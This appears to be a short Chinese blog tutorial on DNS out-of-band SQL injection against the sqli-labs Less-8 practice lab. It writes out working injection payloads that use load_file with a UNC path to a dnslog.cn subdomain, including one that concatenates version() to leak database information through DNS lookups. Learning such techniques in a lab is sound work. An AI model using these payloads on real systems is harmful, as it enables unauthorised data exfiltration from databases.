以sql labs8为例

1.搜索dns.log在线软件,并get一个域名

sql注入——dns的带外注入

2.在cmd中ping该域名,发现解析成功

sql注入——dns的带外注入

sql注入——dns的带外注入

3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行

sql注入——dns的带外注入

4.在dnslog上刷新查询,就可以看到sss就可以请求到了

sql注入——dns的带外注入

5.在语句中修改为http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".cipv66.dnslog.cn\\xxx.txt") )-- -,即可查到版本信息如下:

sql注入——dns的带外注入

 

相关文章:

  • 2021-06-10
  • 2021-11-29
  • 2021-12-02
  • 2021-11-13
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-08-26
猜你喜欢
  • 2021-08-23
  • 2022-12-23
  • 2021-05-16
  • 2022-01-13
  • 2022-01-05
  • 2022-02-25
  • 2021-08-24
相关资源
相似解决方案